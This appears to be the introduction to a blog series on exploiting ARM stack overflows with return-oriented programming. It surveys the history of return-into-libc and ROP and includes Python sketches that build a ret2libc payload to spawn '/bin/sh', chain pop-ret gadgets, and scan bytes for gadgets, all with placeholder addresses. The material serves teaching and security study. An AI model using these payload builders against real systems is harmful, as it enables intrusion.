Building ROP chains
This series is about exploiting simple stack overflow vulnerabilities using return oriented programming (ROP) to defeat data execution prevention (DEP). There are three posts in this series. The posts got pretty dense, and there is a lot to understand. If you miss anything, find bugs (language, grammar, ...), or have ideas for improvements or any questions, do not hesitate to contact me (via Twitter or the contact page). I am happy to answer your questions and incorporate improvements into this post.
Latest Update of this series: 07.09.2018
- 07.09.2018: Added note to successfully set up the bridge interface with qemu (in the first part)
In the first part I describe the setup I used, which includes a set of scripts to build a QEMU-based ArchLinux ARM environment and a vulnerable HTTP daemon, which is exploited during this series.
In the second part I try to explain the general idea of ROP chains, ROP gadgets and how to chain them to achieve a goal. ROP theory!
In the third part we will get into the nitty-gritty details of a ROP chain. I will explain where and how to find gadgets, and how and where to place the ROP chain. In the end we will have regained the permissions DEP took from us!
... on the shoulders of giants (ROP history)
There are thousands of great blogs, videos, tutorials, papers and magazines out there. Many great minds publish, write, draw and record material and make it freely available to everyone. Never in history has it been this easy to learn something: just invest some time and effort. I also had the opportunity to enjoy a great training by @therealsaumil on ARM exploitation during BlackHat this year, which I can recommend. You can find information, resources and a ROP challenge at his blog.
I can't name all of the great minds who influenced me over the years without forgetting somebody. There is a lot of great work on ROP on different platforms. An incomplete list of resources you may want to read before, alongside or after my posts:
In 1997, Solar Designer published the first "return-into-libc" buffer overflow exploit. In those days parts of the stack had just become non-executable. Funnily enough, it was also Solar Designer who posted the patch for the Linux kernel, only to publish a way to circumvent his own patch months later. The term "Return Oriented Programming" was not yet established; "return into libc" was used instead. The exploited platform was x86, so return-into-libc defeated a non-executable (NX) stack by searching for the string "/bin/sh" in memory and then using the overflow to place the address of system() and the address of that string on the stack. Execution was redirected to system() (via the overwritten return address consumed by ret) and /bin/sh was executed. He even described how to call two libc functions, the second one without parameters, since its parameters would occupy the exact same stack space as the parameters of the first function call.
He also proposed a fix: placing libc in regions of memory whose addresses contain a zero byte. Since most buffer overflows were exploited via an overflown ASCIIZ string, that would render his version of return-into-libc ineffective (since the address of system() would have a zero byte in it).
His paper: lpr LIBC RETURN exploit
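To make the stack layout described above more concrete, here is a minimal Python sketch of such a payload for 32-bit x86. All addresses and the offset are hypothetical placeholders (they are not taken from the original exploit), and the helper names are my own. The second helper illustrates why the zero-byte fix works: an address containing a zero byte would end an ASCIIZ string copy early.

```python
import struct


def p32(value):
    """Pack an integer as a 32-bit little-endian word (x86)."""
    return struct.pack("<I", value)


def ret2libc_payload(offset, system_addr, return_addr, binsh_addr):
    """Layout: padding | &system | return address for system() | &"/bin/sh"."""
    return b"A" * offset + p32(system_addr) + p32(return_addr) + p32(binsh_addr)


def has_zero_byte(addr):
    """True if the packed address contains a zero byte (ends an ASCIIZ copy)."""
    return b"\x00" in p32(addr)


# Hypothetical values, for illustration only.
OFFSET = 76              # assumed distance from buffer start to saved return address
SYSTEM = 0x40058AE0      # assumed address of system()
EXIT = 0x4004A2D0        # assumed address system() returns to
BINSH = 0x40125F3C       # assumed address of the string "/bin/sh"

payload = ret2libc_payload(OFFSET, SYSTEM, EXIT, BINSH)
```

With a libc mapped at an address such as 0x00123456, has_zero_byte() returns True and the string copy would stop before the rest of the payload reaches the stack.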
Only a few months later, Rafal Wojtczuk extended return-into-libc by:
- Using the PLT addresses of libc functions, which are not located in memory regions with zero bytes in their addresses.
- Placing shellcode in the still executable data segment
A further improvement was published in 2001 in Phrack by Nergal, who described the following methods to call multiple functions with parameters:
- ESP lifting: in binaries compiled with -fomit-frame-pointer, it was possible to reuse their special function epilogue. By returning into that epilogue after calling the first function, the stack pointer is shifted into higher regions (since the original task of the epilogue was to clean up its function's stack frame!), up to the second function's call construct.
- pop-ret: by returning to a pop; ...; pop; ret gadget instead of directly to the second function, you can pop the arguments of the called function off the stack before continuing with the next function. The caveat: gadgets with multiple pops followed by a ret are quite rare.
- frame faking (programs compiled without -fomit-frame-pointer): by overwriting the saved EBP with the address of the next called function's fake frame and returning into a LEAVE; RET gadget, the frame pointer can be moved further and further, to each next called function.
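The pop-ret method from the list above can be sketched as a small chain builder. This is only an illustration under assumptions: the function and gadget addresses are hypothetical, and the helper chain_calls is my own name, not something from Nergal's article. Each call is laid out as function address, return address, arguments; the return address of every call except the last points to a gadget that pops exactly as many words as the call has arguments, so the following ret lands on the next function.

```python
import struct


def p32(value):
    """Pack an integer as a 32-bit little-endian word (x86)."""
    return struct.pack("<I", value)


def chain_calls(calls, pop_ret_gadgets, final_ret=0x41414141):
    """Build a chain of calls using pop-ret gadgets to skip over arguments.

    calls:           list of (function_address, [arguments])
    pop_ret_gadgets: dict mapping number of pops -> gadget address
                     (key 0 would be a plain ret)
    final_ret:       return address used by the last call
    """
    chain = b""
    for index, (func, args) in enumerate(calls):
        is_last = index == len(calls) - 1
        # Every call but the last returns into a gadget that removes its arguments.
        ret = final_ret if is_last else pop_ret_gadgets[len(args)]
        chain += p32(func) + p32(ret) + b"".join(p32(a) for a in args)
    return chain


# Hypothetical addresses, for illustration only.
FUNC1, FUNC2 = 0x40011111, 0x40022222
ARG1, ARG2 = 0x40033333, 0x40044444
POP_RET = 0x08048455     # assumed address of a "pop; ret" gadget

chain = chain_calls([(FUNC1, [ARG1]), (FUNC2, [ARG2])], {1: POP_RET})
```

A function with three arguments would need a gadget with three pops, which is exactly where the rarity of such gadgets becomes a problem.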
Borrowed Code Chunks
With the ELF64 ABI, the parameters of a function are passed in registers instead of on the stack. This rendered the return-into-libc technique described above useless in its original form. Sebastian Krahmer then described the "borrowed code chunks" technique, which used a gadget (even if not yet named that) to move the value of register rsp into register rdi and then ret, executing system() again in an ELF64 ABI binary.
Return Oriented Programming
In 2007 the term Return Oriented Programming (and gadget) was coined by H. Shacham in a paper named "The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)". He generalized the principle of return oriented programming by using "short code sequences" (i.e. gadgets) instead of whole functions. He described a set of gadgets which were "Turing complete by inspection", so they allowed arbitrary computation.
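To give a feeling for what such "short code sequences" look like, here is a toy Python sketch that scans raw x86 bytes for a ret (opcode 0xC3) and walks backwards over a handful of one-byte instructions. It is not a real gadget finder: the opcode table is deliberately tiny, and the sample bytes and base address are made up. Note that the first gadget it reports sits inside the immediate operand of a mov instruction, so it is a sequence the compiler never intended to emit.

```python
# A few one-byte x86 instructions; a real tool would use a full disassembler.
ONE_BYTE_OPS = {
    0x58: "pop eax", 0x59: "pop ecx", 0x5A: "pop edx", 0x5B: "pop ebx",
    0x5D: "pop ebp", 0x5E: "pop esi", 0x5F: "pop edi", 0xC9: "leave",
}
RET = 0xC3


def find_gadgets(code, base=0, max_ops=3):
    """Return (address, text) pairs for runs of known one-byte ops ending in ret."""
    gadgets = []
    for end, byte in enumerate(code):
        if byte != RET:
            continue
        ops = []
        start = end
        # Walk backwards from the ret while the preceding byte is a known opcode.
        while start > 0 and len(ops) < max_ops and code[start - 1] in ONE_BYTE_OPS:
            start -= 1
            ops.insert(0, ONE_BYTE_OPS[code[start]])
            gadgets.append((base + start, "; ".join(ops + ["ret"])))
    return gadgets


# Made-up sample: "mov eax, 0xc35b" (b8 5b c3 00 00) followed by
# "pop esi; pop edi; ret" (5e 5f c3).
sample = bytes.fromhex("b85bc300005e5fc3")
gadgets = find_gadgets(sample, base=0x1000)
```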
ROP on ARM
In 2010, Tim Kornau published his diploma thesis on ROP on ARM architectures. He nicely summarized how gadgets and ROP shellcode on ARM can be crafted. It really is one of the foundations of my summary on that topic, so if you want an even deeper dive into ROP on ARM, make sure to work through his great thesis. A second must-read is the technical paper Return-Oriented Programming without Returns on ARM. It describes many of the techniques used here!
More interesting papers
A short, incomplete list of publications you might want to look over:
- Alphanumeric RISC ARM Shellcode
- Code Injection Attacks on Harvard-Architecture Devices
- Return-Oriented Programming on a Cortex-M Processor
If you miss any links here, let me know!